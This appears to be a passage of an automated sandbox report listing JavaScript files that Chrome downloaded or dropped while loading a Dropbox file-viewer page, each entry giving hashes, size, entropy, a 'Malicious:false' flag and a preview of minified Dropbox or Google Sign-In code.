                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:71D511E17C67194B1FF6A747386EDCA9
                                                    SHA1:2D37A6BDA3C4613E123C6BF174FC7DCEE1FAAFB6
                                                    SHA-256:8CA7B9B1ED600FBFD32FDF1F44932698565CC4DE86AAB92E4B251468657F78A4
                                                    SHA-512:15257A02C5E9479FF135EFB0FEBF9B1606E8703223E16BB5B0477C5C28791CCC3CD4C814C651C34D51E667CFB8B1C26259CEE606D8E6CE5CB68BC9107FE6ADA3
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_file_viewer_mobile_web_redesign_mobile_header-vflcdUR4X.js
                                                    Preview:define(["require","exports","react","./c_core_i18n","./e_file_viewer_static_scl_page_folder","./c_file_viewer_common_show_auth_modal","./c_file_viewer_api_navigation","./c_file_viewer_preview_archive","./c_file_viewer_title_bar_title_bar_right_section","./c_memoize-one","./c_dig-components_drawer_index","./c_dig-components_list_index","./c_file_viewer_title_bar_title_bar_pass_ui","./c_file_viewer_hooks_useTouchInteraction","./e_data_modules_stormcrow"],(function(e,t,a,i,l,r,n,s,o,c,_,d,u,m,f){"use strict";function g(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(a){if("default"!==a){var i=Object.getOwnPropertyDescriptor(e,a);Object.defineProperty(t,a,i.get?i:{enumerable:!0,get:function(){return e[a]}})}})),t.default=e,Object.freeze(t)}var p=g(a);l.injectInternalStyle("/static/metaserver/static/js/file_viewer/title_bar/shared/titlebar_logo.module.out-vfltgeu25.css",(e=>"._dropboxColor_s73th_1{color:var(--dig-color__text__base)}._dropb
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Unicode text, UTF-8 text, with very long lines (63523)
                                                    Category:dropped
                                                    Size (bytes):63701
                                                    Entropy (8bit):5.288875061913619
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:D40B4520EC2BEF878116E62ECD303BDE
                                                    SHA1:AC9063F4DBF886AF699B91EB6993F3DEEF89006A
                                                    SHA-256:E597F19F23D4D00BAAA1883CEB61432623CCEC2383CAE9DBB2562EA7C2045260
                                                    SHA-512:22A56CD8AAAA14E7C05BC71303CAFAC908F9DDB6D54AA3756AC1848CB5192FF769F92BC74313C55FF13A659C071F5C338B3826F95F829A88302B21E40124E61A
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["require","exports","react","./e_file_viewer_static_scl_page_folder","./e_data_modules_stormcrow","./c_core_i18n","./c_ts_utils","./c_tabs_whats_new_contents_helpers","./c_dig-icons_assets_ui-icon_line_twinkle-1","./e_edison","./c_pap-events_docsend_view_docsend_hub_entry_button","./c_api_v2_routes_folders_info_provider","./e_core_exception","./c_lodash","./c_core_notify","react-dom","./c_src_sink_index","./c_performance_metrics_route_name_resolver","./c_integrations_hellosign_deep_integration_constants","metaserver/static/js/modules/constants/viewer","metaserver/static/js/langpack"],(function(e,t,a,n,l,r,o,i,s,d,c,u,m,g,p,f,_,x,h,b,w){"use strict";function y(e){return e&&e.__esModule?e:{default:e}}var T=y(a);n.injectInternalStyle("/static/js/growth-components/learning-center-sidebar-button/index.module.out-vflKXI_l2.css",(e=>"._sidebar-btn_o1nf8_1{background:none;border:none;color:inherit;cursor:pointer;font:inherit;outline:inherit;padding:0;width:100%}._sidebar-btn_o1nf8_1:fo
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (24241)
                                                    Category:dropped
                                                    Size (bytes):24294
                                                    Entropy (8bit):5.343824800829982
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:C0381EDB2E316AB8B369483C9F62965B
                                                    SHA1:DB6F0C6B302E4B005C6314D9A6A95F9EB0CD7BFA
                                                    SHA-256:0E771BFE878688AA799FD09710FB63845784C23F4A93B54F10AAA9F22D741AC9
                                                    SHA-512:A53A5E0BA753DA4936DD87182C46F0C6463A223F4B43834D3CCB4B58B24E652D425ED3206791AE13F962D8FB3DE589712E5775AB16E3F752F8D97B1D3B771A5D
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./c_core_i18n","./c_extensions_open_button_types","./c_action_plugins_download_action_button","./e_file_viewer_static_scl_page_folder","./c_api_v2_routes_folders_info_provider","./c_ts_utils","./c_pap-events_docsend_view_docsend_hub_entry_button","./c_lodash","./c_core_notify","./c_browse_models"],(function(e,t,n,s,i,_,o,r,a,c,l){"use strict";const h={0:{displayName:t.intl.formatMessage({id:"wYkgel",defaultMessage:"DEFAULT"})},1:{displayName:t.intl.formatMessage({id:"EMXHTJ",defaultMessage:"Send for signature"}),developerDescription:t.intl.formatMessage({id:"EMXHTJ",defaultMessage:"Send for signature"})},2:{displayName:t.intl.formatMessage({id:"aIQiHy",defaultMessage:"PDF Editing"}),developerDescription:t.intl.formatMessage({id:"fG5ZbA",defaultMessage:"PDF editing"})},3:{displayName:t.intl.formatMessage({id:"e6EJBF",defaultMessage:"View or Edit"}),developerDescription:t.intl.formatMessage({id:"p+tBI0",defaultMessage:"View or edit"})},4:{displayName:t.intl.formatMessa
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (11961)
                                                    Category:dropped
                                                    Size (bytes):12028
                                                    Entropy (8bit):5.277665140921504
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:88881A5F8F8EB342A0049601D20E7862
                                                    SHA1:F44021D76832CDE6C2F438DA23E0420AA837B9EC
                                                    SHA-256:4D14447D07FD9550B70ADEA8D2256C6C8C8BBFAB0EE73FAF6920C92C8D2B50AE
                                                    SHA-512:B13A8853AA37C488DB6D8AE6D01E2699F44D79CF7892DCD72ECD63716E29B39336341A8678DB08FC77D53463638C16D4C490C86E6CC1D7DD545D012CF2831229
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["require","exports","./c_core_i18n","react","./e_file_viewer_static_scl_page_folder","./c_flows_conversions_utils","./c_flows_constants","./c_api_v2_routes_folders_info_provider","./c_ui_image","./c_browse_action_logger","./c_tagging_utils","./e_core_exception","./c_tagging_data_store","./c_search_search_helpers","./c_sync_everything_redux_types","./c_flows_redux_reducer","./c_flows_redux_store","./c_flows_redux_actions","./c_flows_utils_browse_logger","./c_flows_utils_auto_folder_helpers","./c_flows_redux_selectors","./c_browse_data_selectors","./c_flows_utils_async_modal_launchers","./c_dig-icons_assets_ui-icon_line_file-history","react-dom"],(function(e,t,o,n,i,a,r,s,l,c,u,d,_,f,p,g,m,v,h,A,w,y,k,b,E){"use strict";function T(e){return e&&e.__esModule?e:{default:e}}function S(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(o){if("default"!==o){var n=Object.getOwnPropertyDescriptor(e,o);Object.defineProperty(t,o,n.get?n:{enum
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (327)
                                                    Category:downloaded
                                                    Size (bytes):382
                                                    Entropy (8bit):5.159575588429005
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:B4FCA5DBE1D2F1F3A2D3319397E1FF7B
                                                    SHA1:886B348C1F4365E1CEE951974F59B42739CF15E0
                                                    SHA-256:8487F6E6023FC12E97F3D5B2579B79782AEE07C625324D1C5A0A9ECFD36D23C4
                                                    SHA-512:B16C479C2F8B613AF758B80BDAE96DE271B6FE33D77C40F64E70E23ABA358231BC28506342AA300A7092C024B0DDE0ADA883ABC0353DBE3B38D08BAD1CCDC731
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_growth_ui_api-vfltPyl2-.js
                                                    Preview:define(["exports","./c_pap-events_docsend_view_docsend_hub_entry_button","./e_file_viewer_static_scl_page_folder"],(function(e,t,o){"use strict";const _=(e,_)=>{const s=new o.DefaultUserApiV2Client(e);t.GetGrowthRoutes(s).rpc("mark_onboarding_modules_as_completed",{modules:_},{})};e.markModuleAsCompleted=(e,t)=>{_(e,[t])}}));.//# sourceMappingURL=c_growth_ui_api.js-vfl61CMx9.map.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (8489)
                                                    Category:dropped
                                                    Size (bytes):8573
                                                    Entropy (8bit):5.470903213404661
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:A16FBDE6AE082E4C0B7A4830378BE61D
                                                    SHA1:0A91D63C2EA1720049142FCE4B6D768CDB13783B
                                                    SHA-256:341AF5C7952122644C7B05D6A501D128000B9A70A475E37D6A565A10DD82FACD
                                                    SHA-512:4C64A3F228CF91466BF31C7D1990C5DB0C952B2163621139082BF6DA5919B30CA0172911F90B94AD06D559932BC00D97B4D2D4E38B37168D7D7F8EC29B5CE4E6
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","./c_profile_services_profile_services_link","./c_core_i18n","./c_ts_utils","react"],(function(e,t,a,i,s,n){"use strict";function o(e){return e&&e.__esModule?e:{default:e}}var l,r=o(n);e.Strings=void 0,(l=e.Strings||(e.Strings={})).OK=i.intl.formatMessage({id:"G6rEKj",defaultMessage:"OK"}),l.NEXT=i.intl.formatMessage({id:"yah+je",defaultMessage:"Next"}),l.BACK=i.intl.formatMessage({id:"k9vJ0G",defaultMessage:"Back"}),l.CANCEL=i.intl.formatMessage({id:"S53N5s",defaultMessage:"Cancel"}),l.CREATE=i.intl.formatMessage({id:"cVVoCl",defaultMessage:"Create"}),l.SAVE=i.intl.formatMessage({id:"HqImMi",defaultMessage:"Save"}),l.LEARN_MORE=i.intl.formatMessage({id:"sUsXMb",defaultMessage:"Learn more"}),l.DONE=i.intl.formatMessage({id:"H/MlMr",defaultMessage:"Done"}),l.FINISH=i.intl.formatMessage({id:"n4dBJ7",defaultMessage:"Finish"}),l.CLOSE=i.intl.formatMessage({id:"/nCb7L",defaultMessage:"Close"}),l.DISMISS=i.intl.formatMessage({id:"h4r
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (4552)
                                                    Category:downloaded
                                                    Size (bytes):4643
                                                    Entropy (8bit):5.092496411367988
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:85068D48629717D718735EEC8FE3134A
                                                    SHA1:C59DCA4BD76D4DD918F3CF8AAED997AC2893660E
                                                    SHA-256:3B8AC462084B1CFCEA38BEC36C9F3E15B29FAFE56C5A2A2C9716F62CDCE2ED37
                                                    SHA-512:DE2896C3E9A04C818C97DB2132D0E5430DDBC63881F7B41DFE79BC0CFA44E0A4D82B522DD3AF849CDAF6A5BCDF0EDDC2E637D162270E9417C71413F7E7C6C1E2
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_file_viewer_mobile_web_redesign_mobile_action_bar-vflhQaNSG.js
                                                    Preview:define(["exports","react","./c_core_i18n","./e_file_viewer_static_scl_page_folder","./c_mobile_web_redesign_actions_use_actions","./e_core_exception","./c_lodash","./c_src_sink_index","./c_pap-events_docsend_view_docsend_hub_entry_button","./c_ts_utils","metaserver/static/js/langpack","./e_edison","./c_api_v2_routes_folders_info_provider","./e_data_modules_stormcrow","./c_core_notify","react-dom","./c_performance_metrics_route_name_resolver","./c_integrations_hellosign_deep_integration_constants","metaserver/static/js/modules/constants/viewer","./c_action_bar_action_bar_strings","./c_memoize-one","./c_admin_registration_source_constants","./c_sharing_sharing_pap_logging_create_shared_link_util","./c_sharing_low_distraction_view_gating_utils","./c_dig-icons_assets_ui-icon_line_passwords","./c_action_plugins_conversion_action_conditions","./c_action_plugins_audio_video_edit_action_definition","./c_photo-editor_plugin_show-edit-plugin","./c_pap-events_sign_save_signature_doc","./c_dig-ico
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (8035)
                                                    Category:downloaded
                                                    Size (bytes):8114
                                                    Entropy (8bit):5.217191268288043
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:571DD65816989ECC08EE541B12B6D9D0
                                                    SHA1:ED18F7AEBE0E143B5903D08A3BF5068DBAABBB53
                                                    SHA-256:512F0C95DF498DC2DE2597C6580B3D33927335033DBAED812DC50766169F3E41
                                                    SHA-512:D4FDA9D0AE01A46F6ED95D54AE5D5D6CB46E90121DEDE83EE9C37465F7E325B63AE715ADE79ABE82093F5D424C25BF714EEE14DB3130330764868742FA22A68E
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_juggle_resize-observer_ResizeObserver-vflVx3WWB.js
                                                    Preview:define(["exports"],(function(e){"use strict";var t,n=[],r="ResizeObserver loop completed with undelivered notifications.";!function(e){e.BORDER_BOX="border-box",e.CONTENT_BOX="content-box",e.DEVICE_PIXEL_CONTENT_BOX="device-pixel-content-box"}(t||(t={}));var i,o=function(e){return Object.freeze(e)},s=function(e,t){this.inlineSize=e,this.blockSize=t,o(this)},a=function(){function e(e,t,n,r){return this.x=e,this.y=t,this.width=n,this.height=r,this.top=this.y,this.left=this.x,this.bottom=this.top+this.height,this.right=this.left+this.width,o(this)}return e.prototype.toJSON=function(){var e=this;return{x:e.x,y:e.y,top:e.top,right:e.right,bottom:e.bottom,left:e.left,width:e.width,height:e.height}},e.fromRect=function(t){return new e(t.x,t.y,t.width,t.height)},e}(),c=function(e){return e instanceof SVGElement&&"getBBox"in e},u=function(e){if(c(e)){var t=e.getBBox(),n=t.width,r=t.height;return!n&&!r}var i=e,o=i.offsetWidth,s=i.offsetHeight;return!(o||s||e.getClientRects().length)},h=function(
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (2315)
                                                    Category:downloaded
                                                    Size (bytes):231749
                                                    Entropy (8bit):5.552814799952754
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:5BD10C8F86295C382595BB25B244902D
                                                    SHA1:EF5055278646EEBDD1C27E87797B218D3B65355C
                                                    SHA-256:5B29FEABBD32024DEB760AE14F0B46C817EC6908D082AA9416006B74973503AB
                                                    SHA-512:D866BFA2C369C5A01DA772A4C785821EDD27243C64EBC57C0F2977D6C05583280D3F37918C11984B038DC6950736D1A265F1BC9523CEE0129A97B75DFA2DBF80
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://accounts.google.com/gsi/client
                                                    Preview:"use strict";this.default_gsi=this.default_gsi||{};(function(_){var window=this;.try{._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x31220000, 0x605, ]);.var aa,ba,ca,da,t,ea,fa,ha,ja;aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};da=ca(this);t=function(a,b){if(b)a:{var c=da;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writab
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1865)
                                                    Category:dropped
                                                    Size (bytes):1951
                                                    Entropy (8bit):5.208191859496678
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:1A09350A3C61B3F6F5AC8E933E99AA8A
                                                    SHA1:1C0475C363CEBF5D7372DBB123049AA8B0F03F16
                                                    SHA-256:A9C381A8875B4715C5887CAE17A75EBB98663D6A34B9C25ABA4E9183C03C8E74
                                                    SHA-512:475CF4149313751BF457B2C0E37ECCA141FCC015BB599F6050E47CA76C8927454E83E3A9421D2792F15BEEC3564EB3C20805EA24D1BBB710338D8AC424B8355C
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","react","./e_file_viewer_static_scl_page_folder"],(function(e,i,n){"use strict";function t(e){return e&&e.__esModule?e:{default:e}}var r=t(i);n.injectInternalStyle("/static/typescript/component_libraries/pro-ui/src/components/branding/shared_previews/file_viewer_preview.module.out-vfl3F1kzN.css",(e=>"._branding-file-viewer-preview-background_1ptn3_1{background-size:cover;height:100%;width:100%}._file-viewer-preview-branding_1ptn3_7{height:max(10vw,10vh);left:var(--spacing__unit--4);position:absolute;top:var(--spacing__unit--4);width:max(10vw,10vh)}._branding-file-viewer-preview-background-video_1ptn3_15{min-height:100vh;min-width:100vw;position:fixed}"));const a="_branding-file-viewer-preview-background_1ptn3_1",d="_file-viewer-preview-branding_1ptn3_7",l="_branding-file-viewer-preview-background-video_1ptn3_15",o=({isEditing:e,children:i,...t})=>{const{background:d}=n.getBranding(t);return!n.hasAsset(d)||e?r.default.createElement(r.default.Fragment,null,i):d.type===n
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (22824)
                                                    Category:downloaded
                                                    Size (bytes):22893
                                                    Entropy (8bit):5.306630026621211
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:1E6C792BE7BD4129E36BDE7D8EE8BA81
                                                    SHA1:3B8548953FF2B5EA6152B37A1FC6BF464147B86E
                                                    SHA-256:99F59EBF9D53F2265F726C1A89F50C6E89C8D915DD0C7BF0455C2FC4CF8497DC
                                                    SHA-512:B6A30E9B28D0947C0550319BB075305E8C9F8AAAFD4B99A7E7C81631AE7630BB95A0FDE9EC59E44E88A8961124847A54AD51011351E76E7876C8577E5D20D702
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_dig-components_drawer_index-vflHmx5K-.js
                                                    Preview:define(["exports","react","./e_file_viewer_static_scl_page_folder"],(function(e,t,n){"use strict";function r(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(n){if("default"!==n){var r=Object.getOwnPropertyDescriptor(e,n);Object.defineProperty(t,n,r.get?r:{enumerable:!0,get:function(){return e[n]}})}})),t.default=e,Object.freeze(t)}var a=r(t),i=function(){return i=Object.assign||function(e){for(var t,n=1,r=arguments.length;n<r;n++)for(var a in t=arguments[n])Object.prototype.hasOwnProperty.call(t,a)&&(e[a]=t[a]);return e},i.apply(this,arguments)};"function"==typeof SuppressedError&&SuppressedError;var o="right-scroll-bar-position",l="width-before-scroll-bar";function s(e,n){return r=n||null,a=function(t){return e.forEach((function(e){return function(e,t){return"function"==typeof e?e(t):e&&(e.current=t),e}(e,t)}))},(i=t.useState((function(){return{value:r,callback:a,facade:{get current(){return i.value},set current(e){var t=i.value;t!==
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (4838)
                                                    Category:downloaded
                                                    Size (bytes):4900
                                                    Entropy (8bit):5.511893372031185
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:D6C040139EDAEFE69D5BD693BDC2943A
                                                    SHA1:3F4AA2FABB3FD77E3F5FEBC33D62574E7557E8EC
                                                    SHA-256:1A9F22D48F4774860BC8181D506CCB5134B1323635333FD1D3F8BAE76BC3391F
                                                    SHA-512:DA339526771024CCEFF3F44A16DA5FB5B1074FBB9CC3F06867FAE1F5C05EE75BA2AD509736EC2FEEB4C97CC89764A091BCCA977E78DD1AFD887E08DED38A3DC6
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_cloud_docs_constants-vfl1sBAE5.js
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","./e_edison","./c_core_i18n"],(function(e,o,s,l){"use strict";var t,i,a;!function(e){e.PAPER="paper",e.PAPER_TEMPLATE="papert",e.PAPER_BINDER="binder"}(t||(t={})),function(e){e.PAPER="paper",e.PAPER_TEMPLATE="papert",e.PAPER_BINDER="binder"}(i||(i={})),e.GoogleFileTypes=void 0,(a=e.GoogleFileTypes||(e.GoogleFileTypes={})).GOOGLE_DSS_DOC="gdoc",a.GOOGLE_DSS_SHEET="gsheet",a.GOOGLE_DSS_SLIDES="gslides";const _={[e.GoogleFileTypes.GOOGLE_DSS_DOC]:l.intl.formatMessage({id:"mh13Sm",defaultMessage:"Google Doc"}),[e.GoogleFileTypes.GOOGLE_DSS_SHEET]:l.intl.formatMessage({id:"EA8pnR",defaultMessage:"Google Sheet"}),[e.GoogleFileTypes.GOOGLE_DSS_SLIDES]:l.intl.formatMessage({id:"gYrVaF",defaultMessage:"Google Slides"})};var g;e.PointerFileTypes=void 0,(e.PointerFileTypes||(e.PointerFileTypes={})).SIMPLE_POINTER="dlink",function(e){e.WORD="docx",e.EXCEL="xlsx",e.POWERPOINT="pptx"}(g||(g={}));const n={[g.WORD]:l.intl.formatMessage({id:"cy
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (2327)
                                                    Category:dropped
                                                    Size (bytes):2400
                                                    Entropy (8bit):5.286630966268043
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:9A404C5A3040682A8F1919A6753FA94E
                                                    SHA1:17DE4B77D492F3DF95EA5B8A4EE356183501BA55
                                                    SHA-256:6B224B573D9F0C05E4273FFBC4531EB32156E2F4219A684B6DD3758A8AC17A43
                                                    SHA-512:5A8FBD12F340452168FC66540E7C18B35754073D2AD631F0CC9E905267B69AF3A217E784DEB996C31766A1BFFDFDD4BF71E5570FC37754F71716BDC34C037B1B
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","./c_sync_everything_redux_types","./c_browse_models"],(function(e,t,r,n){"use strict";const l=e=>{var r;return!!t.BACKUP_ICONS.includes(null!==(r=null==e?void 0:e.icon)&&void 0!==r?r:"")||e instanceof n.File&&(!!e.is_in_backup_folder||!!e.is_backup_folder)},i=e=>t.getStateAtNamespace(e,t.BACKUP_NAMESPACE_KEY)||r.defaultBackupState,o=e=>i(e).backups,s=(e,t)=>({id:e.id,name:e.name,nestLevel:a(e,t),rootNsId:e.rootNsId,deviceId:e.deviceId,anchorFolders:e.anchorFolders,displayName:e.displayName,..."cb"===e.type?{type:"cb",usesAnchors:!!e.usesAnchors,thirdPartyProviders:e.thirdPartyProviders}:"edb"===e.type?{type:"edb",isFission:!!e.rootNsId}:{type:"third_party"}}),a=(e,r)=>{if(!r||0===r.length)return 0;let n=t.rootRelativePath(e.fqPath);if("edb"===e.type&&e.isFission){if(1===r.length)return 0;n=e.fqPath}return r.indexOf(n)},u=t.createSelector(o,(e=>r=>{if(!e||!r)return null;const n=[r,...t.parent_dirs(r)],l=e.find((e=>n.includes(t.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (4213)
                                                    Category:downloaded
                                                    Size (bytes):4326
                                                    Entropy (8bit):5.251635437616568
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:A2A9C69217541B6E3DB145A0EC1D19DD
                                                    SHA1:44454196B4F8026C1243053550566D3996221DAD
                                                    SHA-256:FF2A146C9FD20A2BE5FCB15BAB428C2A221606B1AF63BFCD94C6AFA0FF0D84CD
                                                    SHA-512:CD4D113ABA36CF91B59505CEAD5707F645C1980F01A4248E0CA545964CAF8146892244FE818EF255240ECCD89FA1BDC3006727D63E33BA04D67F5EB5FE2D6205
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_shared-folder-preview-page_actions_on-join-primary-folder.after-display-vfloqnGkh.js
                                                    Preview:define(["exports","./c_core_i18n","./e_file_viewer_static_scl_page_folder","./e_core_exception","./c_account_email_verify_reasons","./c_account_email","./c_src_sink_index","./c_pap-events_docsend_view_docsend_hub_entry_button","./c_ts_utils","./c_lodash","metaserver/static/js/langpack","react","./e_edison","./c_api_v2_routes_folders_info_provider","./e_data_modules_stormcrow","./c_core_notify","react-dom","./c_performance_metrics_route_name_resolver","./c_integrations_hellosign_deep_integration_constants","metaserver/static/js/modules/constants/viewer","./c_ui_modal_dig"],(function(e,i,r,o,t,n,s,a,c,l,d,_,u,f,g,E,T,v,p,m,h){"use strict";const I=async(e,i,o,t,s,a,c,l)=>await new Promise((d=>{(async(e,i,o,t,s,a,c,l,d,_,u)=>{if(e&&e.is_email_verified)return;const f=n.EmailVerification.get_for_user(r.DeprecatedViewer.get_viewer(),e);f.show_resend=!0,f.show(o,i,t,u),r.logTiburonEvent(e,s,r.TiburonEventName.ViewVerifyEmailModal,a,null!=c?c:r.SHARE_ACTION_ORIGIN_TYPE.PREVIEW_PAGE,l,d,null!=_&
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1774)
                                                    Category:downloaded
                                                    Size (bytes):1861
                                                    Entropy (8bit):5.397023850693507
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:1859C6CCC0387EA74FD6D6D415244D55
                                                    SHA1:9A07500C50A03772468C542D91DBC4E82B074E24
                                                    SHA-256:44AF86FA2EFC1F33E741B595BBC11B6CD5A85DDBACE0E4D3117F0BA3E7C5F413
                                                    SHA-512:8638ED6F19A6FD2F7F5792C4285FD5B6A3ECF34DDEEE08564C24F4A3B5F67D41A9E6A9F735FAD77066FB1CB15F02ABA1B056C03EBFA1B4BB1370AAE259BBA2A1
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_dig-icons_assets_ui-icon_line_member-transfer-vflGFnGzM.js
                                                    Preview:define(["exports","react"],(function(e,t){"use strict";function r(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(r){if("default"!==r){var n=Object.getOwnPropertyDescriptor(e,r);Object.defineProperty(t,r,n.get?n:{enumerable:!0,get:function(){return e[r]}})}})),t.default=e,Object.freeze(t)}var n=r(t);e.DropboxTransferLine=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.createElement("path",{d:"M13.818 12 9.5 5h5.182L19 12l-4.318 7H9.5l4.318-7Z",fill:"currentColor",vectorEffect:"non-scaling-stroke"}),n.createElement("path",{d:"m11 10.694-.93 1.533.93 1.579L8.465 18 5 12.227 8.465 6.5 11 10.694Z",fill:"currentColor",vectorEffect:"non-scaling-stroke"})),e.FullscreenLine=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.createElement("path",{d:"M10 5H5v5h1.5V6.5H10V5ZM6.5 17.5H10V19H5v-5h1.5v3.5ZM14 19v-1.5h3.5V14H19v5h-5Zm5-14v5h-1.5V6.5H14V5h5Z",fill:"currentColor",vectorEffect:"non-scaling-stroke"})),e.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (14109)
                                                    Category:dropped
                                                    Size (bytes):14193
                                                    Entropy (8bit):5.273307678514522
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:FAB73049845370F11E36274FF79C3DF8
                                                    SHA1:A6BE03DCAD23B769978DEAF834BBB0C37337F8D9
                                                    SHA-256:55BC4C02295B2BB65765E38CF1308DF34B247425C004B39A09A98DFA0F7856B8
                                                    SHA-512:F776FE85B7B3B1C3CE22E6FB1131CA593DBBB9B1DAFBD321A0AB75C657FD8C1E400034736D22C1A63EDAFE0B00FEB2A627AB478D5237C9A94D2D6BD526FBE269
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["require","exports","react","./c_core_i18n","./c_action_plugins_watermarking_action_utils","./e_file_viewer_static_scl_page_folder","./c_dig-icons_assets_ui-icon_line_shape-rotate-right","./c_dig-icons_assets_ui-icon_line_text-box","./c_dig-icons_assets_ui-icon_line_placeholder-text","./c_action_plugins_conversion_action_conditions","./c_action_plugins_audio_video_edit_action_definition","./c_action_bar_action_bar_strings","./c_dig-icons_assets_ui-icon_line_signature","./c_dig-icons_assets_ui-icon_line_upload-file","./c_preview_audio_video_video_editing_strings","./c_dig-illustrations_spot_passcode-lock","./c_dig-icons_assets_ui-icon_line_expand-left","./c_dig-icons_assets_ui-icon_line_stamp","./c_action_plugins_download_action_definition","./c_core_data_ui","./c_file_viewer_components_titlebar_menu_content","./c_file_viewer_api_navigation","./c_preview_audio_video_helper_dimensions","./c_core_utils_is_text_preview_on","./c_react_query_helpers_queries_file_content_metadata","./
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (10746)
                                                    Category:downloaded
                                                    Size (bytes):10798
                                                    Entropy (8bit):5.274809975690967
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:4F73FC25488019667FF27B6B77C1E439
                                                    SHA1:E2960A02069D33C7FF087250A029A980EA68A724
                                                    SHA-256:2E9BF9016C0C8C843E9FFC7911A9D14EEB1788F95726816A5A656FFFB35973FD
